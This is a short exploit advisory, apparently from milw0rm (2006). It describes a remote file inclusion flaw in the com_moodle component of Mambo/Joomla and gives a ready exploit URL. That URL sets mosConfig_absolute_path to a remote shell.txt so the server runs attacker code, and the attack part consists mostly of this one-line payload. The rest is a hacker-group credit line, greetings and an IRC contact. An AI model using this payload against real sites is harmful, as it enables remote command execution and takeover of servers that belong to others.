16 lines
No EOL
514 B
Text
16 lines
No EOL
514 B
Text
####################################################################################
|
|
#Mam - Moodle Remote File Include
|
|
------------------------------------------------------------------------------------
|
|
#Bug Found by: jank0
|
|
#greetz: hackbsd crew
|
|
#risk: dangerous
|
|
##this bug allows a remote atacker to execute commands via rfi
|
|
|
|
path: ?mosConfig_absolute_path=
|
|
|
|
xpl:
|
|
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt
|
|
|
|
Contact: irc.undernet.org #hackbsd
|
|
|
|
# milw0rm.com [2006-07-23] |